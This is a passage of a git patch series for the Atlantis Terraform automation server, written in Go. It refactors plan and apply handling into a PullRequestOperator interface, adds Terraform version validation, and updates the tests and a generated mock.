 		fmt.Sprintf("WORKSPACE=%s", workspace),
-		fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", v.String()),
+		fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", tfVersionStr),
 		fmt.Sprintf("DIR=%s", path),
 	}
 	envVars = append(envVars, os.Environ()...)
diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go
index be9ce1980b..3273cb38a1 100644
--- a/server/events/yaml/raw/project.go
+++ b/server/events/yaml/raw/project.go
@@ -6,6 +6,7 @@ import (
 	"strings"
 
 	"github.com/go-ozzo/ozzo-validation"
+	"github.com/hashicorp/go-version"
 	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 )
 
@@ -39,9 +40,17 @@ func (p Project) Validate() error {
 		}
 		return nil
 	}
+	validTFVersion := func(value interface{}) error {
+		// Safe to dereference because this is only called if the pointer is
+		// not nil.
+		versionStr := *value.(*string)
+		_, err := version.NewVersion(versionStr)
+		return err
+	}
 	return validation.ValidateStruct(&p,
 		validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)),
 		validation.Field(&p.ApplyRequirements, validation.By(validApplyReq)),
+		validation.Field(&p.TerraformVersion, validation.By(validTFVersion)),
 	)
 }
 
@@ -56,7 +65,9 @@ func (p Project) ToValid() valid.Project {
 	}
 
 	v.Workflow = p.Workflow
-	v.TerraformVersion = p.TerraformVersion
+	if p.TerraformVersion != nil {
+		v.TerraformVersion, _ = version.NewVersion(*p.TerraformVersion)
+	}
 	if p.Autoplan == nil {
 		v.Autoplan = DefaultAutoPlan()
 	} else {
diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go
index 75d79a3d93..0a7ef2e972 100644
--- a/server/events/yaml/valid/valid.go
+++ b/server/events/yaml/valid/valid.go
@@ -1,5 +1,7 @@
 package valid
 
+import "github.com/hashicorp/go-version"
+
 // Spec is the atlantis yaml spec after it's been parsed and validated.
 // The raw.Spec is transformed into the ValidSpec which is then used by the
 // rest of Atlantis.
@@ -11,11 +13,38 @@ type Spec struct {
 	Workflows map[string]Workflow
 }
 
+func (s Spec) GetPlanStage(workflowName string) *Stage {
+	for name, flow := range s.Workflows {
+		if name == workflowName {
+			return flow.Plan
+		}
+	}
+	return nil
+}
+
+func (s Spec) GetApplyStage(workflowName string) *Stage {
+	for name, flow := range s.Workflows {
+		if name == workflowName {
+			return flow.Apply
+		}
+	}
+	return nil
+}
+
+func (s Spec) FindProject(dir string, workspace string) *Project {
+	for _, p := range s.Projects {
+		if p.Dir == dir && p.Workspace == workspace {
+			return &p
+		}
+	}
+	return nil
+}
+
 type Project struct {
 	Dir               string
 	Workspace         string
 	Workflow          *string
-	TerraformVersion  *string
+	TerraformVersion  *version.Version
 	Autoplan          Autoplan
 	ApplyRequirements []string
 }
diff --git a/server/server.go b/server/server.go
index 368553a0ea..fe6e3f7b5f 100644
--- a/server/server.go
+++ b/server/server.go
@@ -36,7 +36,7 @@ import (
 	"github.com/runatlantis/atlantis/server/events/locking"
 	"github.com/runatlantis/atlantis/server/events/locking/boltdb"
 	"github.com/runatlantis/atlantis/server/events/models"
-	"github.com/runatlantis/atlantis/server/events/run"
+	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
 	"github.com/runatlantis/atlantis/server/events/webhooks"
@@ -188,23 +188,12 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		return nil, err
 	}
 	lockingClient := locking.NewClient(boltdb)
-	run := &run.Run{}
-	configReader := &events.ProjectConfigManager{}
 	workspaceLocker := events.NewDefaultAtlantisWorkspaceLocker()
 	workspace := &events.FileWorkspace{
 		DataDir: userConfig.DataDir,
 	}
 	projectLocker := &events.DefaultProjectLocker{
-		Locker:       lockingClient,
-		Run:          run,
-		ConfigReader: configReader,
-		Terraform:    terraformClient,
-	}
-	executionPlanner := &events.ExecutionPlanner{
-		ParserValidator:   &yaml.ParserValidator{},
-		DefaultTFVersion:  terraformClient.Version(),
-		TerraformExecutor: terraformClient,
-		ProjectFinder:     &events.DefaultProjectFinder{},
+		Locker: lockingClient,
 	}
 	underlyingRouter := mux.NewRouter()
 	router := &Router{
@@ -213,27 +202,6 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		LockViewRouteName:         LockViewRouteName,
 		Underlying:                underlyingRouter,
 	}
-	applyExecutor := &events.ApplyExecutor{
-		VCSClient:         vcsClient,
-		Terraform:         terraformClient,
-		RequireApproval:   userConfig.RequireApproval,
-		Run:               run,
-		AtlantisWorkspace: workspace,
-		ProjectLocker:     projectLocker,
-		ExecutionPlanner:  executionPlanner,
-		Webhooks:          webhooksManager,
-	}
-	planExecutor := &events.PlanExecutor{
-		VCSClient:        vcsClient,
-		Terraform:        terraformClient,
-		Run:              run,
-		Workspace:        workspace,
-		ProjectLocker:    projectLocker,
-		Locker:           lockingClient,
-		ProjectFinder:    &events.DefaultProjectFinder{},
-		ExecutionPlanner: executionPlanner,
-		LockURLGenerator: router,
-	}
 	pullClosedExecutor := &events.PullClosedExecutor{
 		VCSClient: vcsClient,
 		Locker:    lockingClient,
@@ -252,9 +220,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		GitlabUser:  userConfig.GitlabUser,
 		GitlabToken: userConfig.GitlabToken,
 	}
+	defaultTfVersion := terraformClient.Version()
 	commandHandler := &events.CommandHandler{
-		ApplyExecutor:            applyExecutor,
-		PlanExecutor:             planExecutor,
 		EventParser:              eventParser,
 		VCSClient:                vcsClient,
 		GithubPullGetter:         githubClient,
@@ -265,6 +232,35 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		Logger:                   logger,
 		AllowForkPRs:             userConfig.AllowForkPRs,
 		AllowForkPRsFlag:         config.AllowForkPRsFlag,
+		PullRequestOperator: events.PullRequestOperator{
+			TerraformExecutor: terraformClient,
+			DefaultTFVersion:  defaultTfVersion,
+			ParserValidator:   &yaml.ParserValidator{},
+			ProjectFinder:     &events.DefaultProjectFinder{},
+			VCSClient:         vcsClient,
+			Workspace:         workspace,
+			ProjectOperator: events.ProjectOperator{
+				Locker:           projectLocker,
+				LockURLGenerator: router,
+				InitStepOperator: runtime.InitStepOperator{
+					TerraformExecutor: terraformClient,
+					DefaultTFVersion:  defaultTfVersion,
+				},
+				PlanStepOperator: runtime.PlanStepOperator{
+					TerraformExecutor: terraformClient,
+					DefaultTFVersion:  defaultTfVersion,
+				},
+				ApplyStepOperator: runtime.ApplyStepOperator{
+					TerraformExecutor: terraformClient,
+				},
+				RunStepOperator: runtime.RunStepOperator{},
+				ApprovalOperator: runtime.ApprovalOperator{
+					VCSClient: vcsClient,
+				},
+				Workspace: workspace,
+				Webhooks:  webhooksManager,
+			},
+		},
 	}
 	repoWhitelist := &events.RepoWhitelist{
 		Whitelist: userConfig.RepoWhitelist,

From 8ab4857f77bc163db01ccea6bdb154fd33d63ee3 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 15 Jun 2018 16:16:31 +0100
Subject: [PATCH 22/69] Fix all tests

---
 server/events/command_handler_test.go         |  21 +-
 server/events/markdown_renderer_test.go       |  75 ++++---
 .../mocks/mock_pull_request_operator.go       | 154 ++++++++++++++
 server/events/pull_request_operator.go        |  18 +-
 server/events/pull_request_operator_test.go   | 198 ------------------
 .../runtime/apply_step_operator_test.go       |  83 +++++---
 .../events/runtime/init_step_operator_test.go |  10 +-
 .../events/runtime/plan_step_operater_test.go | 144 ++++++-------
 server/events/yaml/parser_validator_test.go   |   6 +-
 server/events/yaml/raw/project.go             |  13 +-
 server/events/yaml/raw/project_test.go        |  44 +++-
 server/events_controller_test.go              |  94 ++++++---
 server/logging/simple_logger.go               |   2 -
 server/server.go                              |   2 +-
 14 files changed, 458 insertions(+), 406 deletions(-)
 create mode 100644 server/events/mocks/mock_pull_request_operator.go

diff --git a/server/events/command_handler_test.go b/server/events/command_handler_test.go
index 598ed6e234..65bcf3c6f5 100644
--- a/server/events/command_handler_test.go
+++ b/server/events/command_handler_test.go
@@ -33,8 +33,7 @@ import (
 	. "github.com/runatlantis/atlantis/testing"
 )
 
-var applier *mocks.MockExecutor
-var planner *mocks.MockExecutor
+var operator *mocks.MockPullRequestOperator
 var eventParsing *mocks.MockEventParsing
 var vcsClient *vcsmocks.MockClientProxy
 var ghStatus *mocks.MockCommitStatusUpdater
@@ -46,8 +45,7 @@ var logBytes *bytes.Buffer
 
 func setup(t *testing.T) {
 	RegisterMockTestingT(t)
-	applier = mocks.NewMockExecutor()
-	planner = mocks.NewMockExecutor()
+	operator = mocks.NewMockPullRequestOperator()
 	eventParsing = mocks.NewMockEventParsing()
 	ghStatus = mocks.NewMockCommitStatusUpdater()
 	workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker()
@@ -58,8 +56,6 @@ func setup(t *testing.T) {
 	logBytes = new(bytes.Buffer)
 	When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0))
 	ch = events.CommandHandler{
-		PlanExecutor:             planner,
-		ApplyExecutor:            applier,
 		VCSClient:                vcsClient,
 		CommitStatusUpdater:      ghStatus,
 		EventParser:              eventParsing,
@@ -67,9 +63,10 @@ func setup(t *testing.T) {
 		MarkdownRenderer:         &events.MarkdownRenderer{},
 		GithubPullGetter:         githubGetter,
 		GitlabMergeRequestGetter: gitlabGetter,
-		Logger:           logger,
-		AllowForkPRs:     false,
-		AllowForkPRsFlag: "allow-fork-prs-flag",
+		Logger:              logger,
+		AllowForkPRs:        false,
+		AllowForkPRsFlag:    "allow-fork-prs-flag",
+		PullRequestOperator: operator,
 	}
 }
 
@@ -203,9 +200,9 @@ func TestExecuteCommand_FullRun(t *testing.T) {
 		When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
 		switch c {
 		case events.Plan:
-			When(planner.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
+			When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
 		case events.Apply:
-			When(applier.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
+			When(operator.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
 		}
 
 		ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
@@ -238,7 +235,7 @@ func TestExecuteCommand_ForkPREnabled(t *testing.T) {
 	headRepo.Owner = "forkrepo"
 	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
 	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
-	When(planner.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
+	When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
 
 	ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
 
diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go
index 287996ea44..414d300810 100644
--- a/server/events/markdown_renderer_test.go
+++ b/server/events/markdown_renderer_test.go
@@ -125,9 +125,11 @@ func TestRenderProjectResults(t *testing.T) {
 						TerraformOutput: "terraform-output",
 						LockURL:         "lock-url",
 					},
+					Workspace: "workspace",
+					Path:      "path",
 				},
 			},
-			"```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n",
+			"Ran Plan in dir: `path` workspace: `workspace`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n",
 		},
 		{
 			"single successful apply",
@@ -135,30 +137,34 @@ func TestRenderProjectResults(t *testing.T) {
 			[]events.ProjectResult{
 				{
 					ApplySuccess: "success",
+					Workspace:    "workspace",
+					Path:         "path",
 				},
 			},
-			"```diff\nsuccess\n```\n\n",
+			"Ran Apply in dir: `path` workspace: `workspace`\n```diff\nsuccess\n```\n\n",
 		},
 		{
 			"multiple successful plans",
 			events.Plan,
 			[]events.ProjectResult{
 				{
-					Path: "path",
+					Workspace: "workspace",
+					Path:      "path",
 					PlanSuccess: &events.PlanSuccess{
 						TerraformOutput: "terraform-output",
 						LockURL:         "lock-url",
 					},
 				},
 				{
-					Path: "path2",
+					Workspace: "workspace",
+					Path:      "path2",
 					PlanSuccess: &events.PlanSuccess{
 						TerraformOutput: "terraform-output2",
 						LockURL:         "lock-url2",
 					},
 				},
 			},
-			"Ran Plan in 2 directories:\n * `path`\n * `path2`\n\n## path/\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n## path2/\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n",
+			"Ran Plan for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n",
 		},
 		{
 			"multiple successful applies",
@@ -166,75 +172,87 @@ func TestRenderProjectResults(t *testing.T) {
 			[]events.ProjectResult{
 				{
 					Path:         "path",
+					Workspace:    "workspace",
 					ApplySuccess: "success",
 				},
 				{
 					Path:         "path2",
+					Workspace:    "workspace",
 					ApplySuccess: "success2",
 				},
 			},
-			"Ran Apply in 2 directories:\n * `path`\n * `path2`\n\n## path/\n```diff\nsuccess\n```\n---\n## path2/\n```diff\nsuccess2\n```\n---\n\n",
+			"Ran Apply for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n```diff\nsuccess2\n```\n---\n\n",
 		},
 		{
 			"single errored plan",
 			events.Plan,
 			[]events.ProjectResult{
 				{
-					Error: errors.New("error"),
+					Error:     errors.New("error"),
+					Path:      "path",
+					Workspace: "workspace",
 				},
 			},
-			"**Plan Error**\n```\nerror\n```\n\n\n",
+			"Ran Plan in dir: `path` workspace: `workspace`\n**Plan Error**\n```\nerror\n```\n\n\n",
 		},
 		{
 			"single failed plan",
 			events.Plan,
 			[]events.ProjectResult{
 				{
-					Failure: "failure",
+					Path:      "path",
+					Workspace: "workspace",
+					Failure:   "failure",
 				},
 			},
-			"**Plan Failed**: failure\n\n\n",
+			"Ran Plan in dir: `path` workspace: `workspace`\n**Plan Failed**: failure\n\n\n",
 		},
 		{
 			"successful, failed, and errored plan",
 			events.Plan,
 			[]events.ProjectResult{
 				{
-					Path: "path",
+					Workspace: "workspace",
+					Path:      "path",
 					PlanSuccess: &events.PlanSuccess{
 						TerraformOutput: "terraform-output",
 						LockURL:         "lock-url",
 					},
 				},
 				{
-					Path:    "path2",
-					Failure: "failure",
+					Workspace: "workspace",
+					Path:      "path2",
+					Failure:   "failure",
 				},
 				{
-					Path:  "path3",
-					Error: errors.New("error"),
+					Workspace: "workspace",
+					Path:      "path3",
+					Error:     errors.New("error"),
 				},
 			},
-			"Ran Plan in 3 directories:\n * `path`\n * `path2`\n * `path3`\n\n## path/\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n## path2/\n**Plan Failed**: failure\n\n---\n## path3/\n**Plan Error**\n```\nerror\n```\n\n---\n\n",
+			"Ran Plan for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n**Plan Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Plan Error**\n```\nerror\n```\n\n---\n\n",
 		},
 		{
 			"successful, failed, and errored apply",
 			events.Apply,
 			[]events.ProjectResult{
 				{
+					Workspace:    "workspace",
 					Path:         "path",
 					ApplySuccess: "success",
 				},
 				{
-					Path:    "path2",
-					Failure: "failure",
+					Workspace: "workspace",
+					Path:      "path2",
+					Failure:   "failure",
 				},
 				{
-					Path:  "path3",
-					Error: errors.New("error"),
+					Workspace: "workspace",
+					Path:      "path3",
+					Error:     errors.New("error"),
 				},
 			},
-			"Ran Apply in 3 directories:\n * `path`\n * `path2`\n * `path3`\n\n## path/\n```diff\nsuccess\n```\n---\n## path2/\n**Apply Failed**: failure\n\n---\n## path3/\n**Apply Error**\n```\nerror\n```\n\n---\n\n",
+			"Ran Apply for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n**Apply Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Apply Error**\n```\nerror\n```\n\n---\n\n",
 		},
 	}
 
@@ -244,13 +262,14 @@ func TestRenderProjectResults(t *testing.T) {
 			ProjectResults: c.ProjectResults,
 		}
 		for _, verbose := range []bool{true, false} {
-			t.Log("testing " + c.Description)
-			s := r.Render(res, c.Command, "log", verbose)
-			if !verbose {
-				Equals(t, c.Expected, s)
-			} else {
-				Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
-			}
+			t.Run(c.Description, func(t *testing.T) {
+				s := r.Render(res, c.Command, "log", verbose)
+				if !verbose {
+					Equals(t, c.Expected, s)
+				} else {
+					Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+				}
+			})
 		}
 	}
 }
diff --git a/server/events/mocks/mock_pull_request_operator.go b/server/events/mocks/mock_pull_request_operator.go
new file mode 100644
index 0000000000..443636863a
--- /dev/null
+++ b/server/events/mocks/mock_pull_request_operator.go
@@ -0,0 +1,154 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: PullRequestOperator)
+
+package mocks
+
+import (
+	"reflect"
+
+	pegomock "github.com/petergtz/pegomock"
+	events "github.com/runatlantis/atlantis/server/events"
+)
+
+type MockPullRequestOperator struct {
+	fail func(message string, callerSkip ...int)
+}
+
+func NewMockPullRequestOperator() *MockPullRequestOperator {
+	return &MockPullRequestOperator{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockPullRequestOperator) Autoplan(ctx *events.CommandContext) events.CommandResponse {
+	params := []pegomock.Param{ctx}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("Autoplan", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()})
+	var ret0 events.CommandResponse
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(events.CommandResponse)
+		}
+	}
+	return ret0
+}
+
+func (mock *MockPullRequestOperator) PlanViaComment(ctx *events.CommandContext) events.CommandResponse {
+	params := []pegomock.Param{ctx}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("PlanViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()})
+	var ret0 events.CommandResponse
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(events.CommandResponse)
+		}
+	}
+	return ret0
+}
+
+func (mock *MockPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) events.CommandResponse {
+	params := []pegomock.Param{ctx}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("ApplyViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()})
+	var ret0 events.CommandResponse
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(events.CommandResponse)
+		}
+	}
+	return ret0
+}
+
+func (mock *MockPullRequestOperator) VerifyWasCalledOnce() *VerifierPullRequestOperator {
+	return &VerifierPullRequestOperator{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockPullRequestOperator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierPullRequestOperator {
+	return &VerifierPullRequestOperator{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockPullRequestOperator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierPullRequestOperator {
+	return &VerifierPullRequestOperator{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierPullRequestOperator struct {
+	mock                   *MockPullRequestOperator
+	invocationCountMatcher pegomock.Matcher
+	inOrderContext         *pegomock.InOrderContext
+}
+
+func (verifier *VerifierPullRequestOperator) Autoplan(ctx *events.CommandContext) *PullRequestOperator_Autoplan_OngoingVerification {
+	params := []pegomock.Param{ctx}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Autoplan", params)
+	return &PullRequestOperator_Autoplan_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type PullRequestOperator_Autoplan_OngoingVerification struct {
+	mock              *MockPullRequestOperator
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *PullRequestOperator_Autoplan_OngoingVerification) GetCapturedArguments() *events.CommandContext {
+	ctx := c.GetAllCapturedArguments()
+	return ctx[len(ctx)-1]
+}
+
+func (c *PullRequestOperator_Autoplan_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]*events.CommandContext, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(*events.CommandContext)
+		}
+	}
+	return
+}
+
+func (verifier *VerifierPullRequestOperator) PlanViaComment(ctx *events.CommandContext) *PullRequestOperator_PlanViaComment_OngoingVerification {
+	params := []pegomock.Param{ctx}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "PlanViaComment", params)
+	return &PullRequestOperator_PlanViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type PullRequestOperator_PlanViaComment_OngoingVerification struct {
+	mock              *MockPullRequestOperator
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext {
+	ctx := c.GetAllCapturedArguments()
+	return ctx[len(ctx)-1]
+}
+
+func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]*events.CommandContext, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(*events.CommandContext)
+		}
+	}
+	return
+}
+
+func (verifier *VerifierPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) *PullRequestOperator_ApplyViaComment_OngoingVerification {
+	params := []pegomock.Param{ctx}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ApplyViaComment", params)
+	return &PullRequestOperator_ApplyViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type PullRequestOperator_ApplyViaComment_OngoingVerification struct {
+	mock              *MockPullRequestOperator
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext {
+	ctx := c.GetAllCapturedArguments()
+	return ctx[len(ctx)-1]
+}
+
+func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]*events.CommandContext, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(*events.CommandContext)
+		}
+	}
+	return
+}
diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go
index 61218e902f..b393fb5b75 100644
--- a/server/events/pull_request_operator.go
+++ b/server/events/pull_request_operator.go
@@ -12,7 +12,15 @@ import (
 	"github.com/runatlantis/atlantis/server/logging"
 )
 
-type PullRequestOperator struct {
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_pull_request_operator.go PullRequestOperator
+
+type PullRequestOperator interface {
+	Autoplan(ctx *CommandContext) CommandResponse
+	PlanViaComment(ctx *CommandContext) CommandResponse
+	ApplyViaComment(ctx *CommandContext) CommandResponse
+}
+
+type DefaultPullRequestOperator struct {
 	TerraformExecutor TerraformExec
 	DefaultTFVersion  *version.Version
 	ParserValidator   *yaml.ParserValidator
@@ -26,7 +34,7 @@ type TerraformExec interface {
 	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
 }
 
-func (p *PullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse {
+func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse {
 	// check out repo to parse atlantis.yaml
 	// this will check out the repo to a * dir
 	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace)
@@ -99,7 +107,7 @@ func (p *PullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse {
 	return CommandResponse{ProjectResults: results}
 }
 
-func (p *PullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse {
+func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse {
 	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace)
 	if err != nil {
 		return CommandResponse{Error: err}
@@ -141,7 +149,7 @@ func (p *PullRequestOperator) PlanViaComment(ctx *CommandContext) CommandRespons
 	}
 }
 
-func (p *PullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse {
+func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse {
 	repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace)
 	if err != nil {
 		return CommandResponse{Failure: "No workspace found. Did you run plan?"}
@@ -185,7 +193,7 @@ func (p *PullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandRespon
 
 // matchingProjects returns the list of projects whose WhenModified fields match
 // any of the modifiedFiles.
-func (p *PullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project {
+func (p *DefaultPullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project {
 	//todo
 	// match the modified files against the config
 	// remember the modified_files paths are relative to the project paths
diff --git a/server/events/pull_request_operator_test.go b/server/events/pull_request_operator_test.go
index 4bbdfd14b5..79457f0dd2 100644
--- a/server/events/pull_request_operator_test.go
+++ b/server/events/pull_request_operator_test.go
@@ -1,199 +1 @@
 package events_test
-
-import (
-	"io/ioutil"
-	"path/filepath"
-	"testing"
-
-	"github.com/hashicorp/go-version"
-	"github.com/runatlantis/atlantis/server/events"
-	"github.com/runatlantis/atlantis/server/events/runtime"
-	"github.com/runatlantis/atlantis/server/logging"
-	. "github.com/runatlantis/atlantis/testing"
-)
-
-// When there is no config file, should use the defaults.
-func TestBuildStage_NoConfigFile(t *testing.T) {
-	var defaultTFVersion *version.Version
-	var terraformExecutor runtime.TerraformExec
-	e := events.PullRequestOperator{
-		DefaultTFVersion:  defaultTFVersion,
-		TerraformExecutor: terraformExecutor,
-	}
-
-	log := logging.NewNoopLogger()
-	repoDir := "/willnotexist"
-	workspace := "myworkspace"
-	relProjectPath := "mydir"
-	var extraCommentArgs []string
-	username := "myuser"
-	meta := runtime.StepMeta{
-		Log:                   log,
-		Workspace:             workspace,
-		AbsolutePath:          filepath.Join(repoDir, relProjectPath),
-		DirRelativeToRepoRoot: relProjectPath,
-		TerraformVersion:      defaultTFVersion,
-		TerraformExecutor:     terraformExecutor,
-		ExtraCommentArgs:      extraCommentArgs,
-		Username:              username,
-	}
-
-	// Test the plan stage first.
-	t.Run("plan stage", func(t *testing.T) {
-		planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-		Ok(t, err)
-		Equals(t, runtime.PlanStage{
-			Steps: []runtime.Step{
-				&runtime.InitStep{
-					Meta: meta,
-				},
-				&runtime.PlanStep{
-					Meta: meta,
-				},
-			},
-		}, planStage)
-	})
-
-	// Then the apply stage.
-	t.Run("apply stage", func(t *testing.T) {
-		applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-		Ok(t, err)
-		Equals(t, runtime.ApplyStage{
-			Steps: []runtime.Step{
-				&runtime.ApplyStep{
-					Meta: meta,
-				},
-			},
-		}, *applyStage)
-	})
-}
-
-func TestBuildStage(t *testing.T) {
-	var defaultTFVersion *version.Version
-	var terraformExecutor runtime.TerraformExec
-	e := events.PullRequestOperator{
-		DefaultTFVersion:  defaultTFVersion,
-		TerraformExecutor: terraformExecutor,
-	}
-
-	// Write atlantis.yaml config.
-	tmpDir, cleanup := TempDir(t)
-	defer cleanup()
-	err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(`
-version: 2
-projects:
-- dir: "."
-  workflow: custom
-workflows:
-  custom:
-    plan:
-      steps:
-      - init:
-          extra_args: [arg1, arg2]
-      - plan
-      - run: echo hi
-    apply:
-      steps:
-      - run: prerun
-      - apply:
